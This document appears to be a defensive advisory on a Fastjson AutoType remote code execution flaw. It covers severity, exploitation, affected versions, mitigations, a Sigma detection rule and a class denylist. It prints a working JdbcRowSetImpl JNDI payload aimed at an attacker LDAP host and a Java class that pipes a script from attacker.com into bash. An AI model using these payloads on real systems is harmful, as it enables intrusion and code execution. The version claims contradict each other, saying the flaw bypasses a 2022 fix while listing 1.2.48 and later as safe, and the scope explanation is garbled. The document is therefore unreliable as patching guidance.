Comprehensive Technical Analysis of CVE-2025-70974 (Fastjson AutoType Remote Code Execution Vulnerability)

1. Vulnerability Assessment and Severity Evaluation

CVE ID: CVE-2025-70974 CVSS Score: 10.0 (Critical) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Vulnerability Type: Remote Code Execution (RCE) via JNDI Injection in Fastjson AutoType Feature Exploitation Status: Actively exploited in the wild (2023–2025)

Severity Justification

• Attack Vector (AV:N): Exploitable remotely over a network without authentication.
• Attack Complexity (AC:L): Low complexity; exploitation requires minimal preconditions.
• Privileges Required (PR:N): No privileges required; unauthenticated attackers can exploit.
• User Interaction (UI:N): No user interaction needed.
• Scope (S:C): Changes scope (impacts confidentiality, integrity, and availability of the affected system).
• Impact (C:H/I:H/A:H): High impact on confidentiality, integrity, and availability (full system compromise possible).

This vulnerability is critical due to its low barrier to exploitation, widespread use of Fastjson in enterprise applications, and active in-the-wild exploitation by threat actors (e.g., AndroxGh0st malware).

---

2. Potential Attack Vectors and Exploitation Methods

Root Cause Analysis

Fastjson’s AutoType feature allows deserialization of JSON objects into Java classes by specifying an @type field. When a JSON payload contains an @type key with a class name, Fastjson dynamically instantiates the class and invokes its methods.

Vulnerability Chain:

1. Incomplete Fix for CVE-2017-18349: Earlier patches attempted to blocklist dangerous classes but were bypassed.
2. Bypass of CVE-2022-25845: Later security controls were circumvented, allowing arbitrary class loading.
3. JNDI Injection: If the attacker-controlled class has a public method that processes attacker-supplied data (e.g., setter methods), it can trigger JNDI lookups to malicious LDAP/RMI servers, leading to RCE.

Exploitation Steps

1. Craft Malicious JSON Payload:

   {
     "@type": "com.sun.rowset.JdbcRowSetImpl",
     "dataSourceName": "ldap://attacker.com:1389/Exploit",
     "autoCommit": true
   }
   

   • The @type specifies a vulnerable Java class (JdbcRowSetImpl).
   • The dataSourceName field triggers a JNDI lookup to an attacker-controlled server.

2. Host Malicious LDAP/RMI Server:

   • The attacker sets up an LDAP server (e.g., using Rogue-JNDI or Marshalsec) that returns a serialized payload containing a malicious Java class.
   • When Fastjson processes the JSON, it performs a JNDI lookup and executes the attacker’s code.

3. Remote Code Execution:

   • The malicious class is loaded and executed, granting the attacker arbitrary code execution on the target system.

Real-World Exploitation

• AndroxGh0st Malware: Exploited this vulnerability to compromise a U.S. university, deploying a C2 (Command & Control) logger (Source: CloudSEK).
• Mass Scanning & Exploitation: Threat actors actively scan for vulnerable Fastjson instances to deploy cryptominers, ransomware, or backdoors.

---

3. Affected Systems and Software Versions

Vulnerable Versions

• Fastjson versions before 1.2.48 (incomplete fix for CVE-2017-18349).
• Fastjson 1.2.47 (explicitly vulnerable, as demonstrated in Vulhub PoC).

Affected Environments

• Java-based web applications using Fastjson for JSON parsing.
• Enterprise middleware (e.g., Alibaba Cloud, Apache Dubbo, Spring Boot integrations).
• Microservices & APIs that deserialize untrusted JSON input.
• Legacy systems where Fastjson is embedded in third-party libraries.

Not Affected

• Fastjson 1.2.48 and later (if properly patched).
• Applications that disable AutoType (ParserConfig.getGlobalInstance().setAutoTypeSupport(false)).

---

4. Recommended Mitigation Strategies

Immediate Actions

1. Upgrade Fastjson:

   • Patch to Fastjson 1.2.48 or later (latest stable version).
   • Verify the fix by checking the GitHub comparison.

2. Disable AutoType (Temporary Workaround):

   ParserConfig.getGlobalInstance().setAutoTypeSupport(false);
   

   • Note: This may break functionality in applications relying on AutoType.

3. Apply Denylist for Dangerous Classes:

   • Manually block known dangerous classes (e.g., com.sun.rowset.JdbcRowSetImpl, java.lang.ClassLoader).
   • Example:

     ParserConfig.getGlobalInstance().addDeny("com.sun.rowset.");
     

4. Input Validation & Sanitization:

   • Reject JSON with @type fields if AutoType is not required.
   • Use strict schema validation to prevent malicious payloads.

Long-Term Security Measures

5. Network-Level Protections:

   • Block outbound JNDI/LDAP/RMI traffic (TCP ports 389, 636, 1099, 1389) at the firewall.
   • Deploy Web Application Firewalls (WAFs) with rules to detect Fastjson exploitation attempts.

6. Runtime Application Self-Protection (RASP):

   • Use RASP solutions (e.g., Contrast Security, Hdiv) to detect and block deserialization attacks.

7. Dependency Scanning & SBOM Management:

   • Use OWASP Dependency-Check, Snyk, or Trivy to identify vulnerable Fastjson versions.
   • Maintain a Software Bill of Materials (SBOM) for tracking dependencies.

8. Zero Trust & Least Privilege:

   • Run Java applications with minimal permissions (e.g., no java.lang.Runtime access).
   • Isolate Fastjson-dependent services in sandboxed environments.

---

5. Impact on the Cybersecurity Landscape

Threat Actor Exploitation

• APT Groups & Cybercriminals: Actively exploiting this vulnerability for initial access, lateral movement, and data exfiltration.
• Cryptojacking & Ransomware: Used to deploy XMRig miners and LockBit/BlackCat ransomware.
• Supply Chain Attacks: Compromised Fastjson instances in third-party libraries can lead to widespread breaches.

Industry-Wide Risks

• Legacy System Exposure: Many enterprises still use outdated Fastjson versions due to dependency conflicts.
• Cloud & Containerized Environments: Vulnerable Fastjson instances in Kubernetes, Docker, and serverless environments increase attack surface.
• Regulatory & Compliance Risks: Failure to patch may result in GDPR, HIPAA, or PCI DSS violations.

Broader Implications

• Deserialization Attacks on the Rise: Fastjson joins a growing list of Java deserialization vulnerabilities (e.g., Log4Shell, Spring4Shell).
• Shift in Attacker TTPs: Threat actors are increasingly targeting JSON parsers and deserialization libraries due to their widespread use.

---

6. Technical Details for Security Professionals

Exploitation Mechanics

1. AutoType Deserialization Flow:

   • Fastjson parses JSON → Detects @type → Loads specified class → Invokes setters/getters.
   • If the class has a JNDI lookup method (e.g., setDataSourceName), it triggers a remote connection.

2. JNDI Injection Payload Example:

   // Malicious LDAP server response (simplified)
   public class Exploit {
       static {
           try {
               Runtime.getRuntime().exec("curl http://attacker.com/shell.sh | bash");
           } catch (Exception e) {}
       }
   }
   

   • The attacker’s LDAP server returns a serialized Exploit class, which executes arbitrary commands upon deserialization.

3. Bypass Techniques:

   • Class Name Obfuscation: Using hex-encoded or nested class names to evade denylists.
   • Alternative JNDI Protocols: Exploiting RMI, CORBA, or custom JNDI providers instead of LDAP.
   • Reflection Abuse: Leveraging java.lang.reflect to bypass security checks.

Detection & Forensics

1. Network Indicators:

   • Unexpected outbound LDAP/RMI connections (ports 389, 636, 1099, 1389).
   • DNS lookups for attacker-controlled domains (e.g., evil.com).

2. Log Analysis:

   • Fastjson error logs containing @type deserialization attempts.
   • Java stack traces with JdbcRowSetImpl or other dangerous classes.

3. Memory Forensics:

   • Volatility/Redline analysis to detect injected malicious classes.
   • Heap dumps showing unexpected class loading.

4. YARA/Sigma Rules:

   # Sigma Rule for Fastjson Exploitation
   title: Fastjson AutoType Exploitation Attempt
   description: Detects JSON payloads with @type field targeting known vulnerable classes
   logsource:
     category: webserver
   detection:
     selection:
       cs-method: 'POST'
       cs-uri-query|contains: '@type'
       cs-body|contains:
         - 'com.sun.rowset.JdbcRowSetImpl'
         - 'java.lang.ClassLoader'
     condition: selection
   

Proof-of-Concept (PoC) Analysis

• Vulhub PoC (Fastjson 1.2.47 RCE):
  • Demonstrates JNDI injection via JdbcRowSetImpl.
  • GitHub Link
• Exploit-DB & Seebug References:
  • Multiple public exploits available (e.g., Seebug SSVID-98020).

---

Conclusion & Recommendations

CVE-2025-70974 represents a critical, actively exploited vulnerability in Fastjson’s AutoType feature, enabling remote code execution via JNDI injection. Given its CVSS 10.0 severity and real-world exploitation by threat actors, organizations must prioritize patching, disable AutoType where possible, and implement network-level protections.

Action Plan for Security Teams

Priority	Action	Owner	Timeline
Critical	Patch Fastjson to ≥1.2.48	DevOps/SRE	Immediate (24h)
High	Disable AutoType in production	Application Teams	48h
High	Block outbound JNDI/LDAP traffic	Network Security	72h
Medium	Deploy WAF rules for Fastjson attacks	Security Operations	1 week
Medium	Scan for vulnerable dependencies	DevSecOps	1 week
Low	Conduct forensic analysis on suspicious activity	Threat Hunting	Ongoing

Final Note: Due to the ease of exploitation and high impact, this vulnerability should be treated with the same urgency as Log4Shell (CVE-2021-44228). Organizations should assume breach if unpatched Fastjson instances are exposed to untrusted input.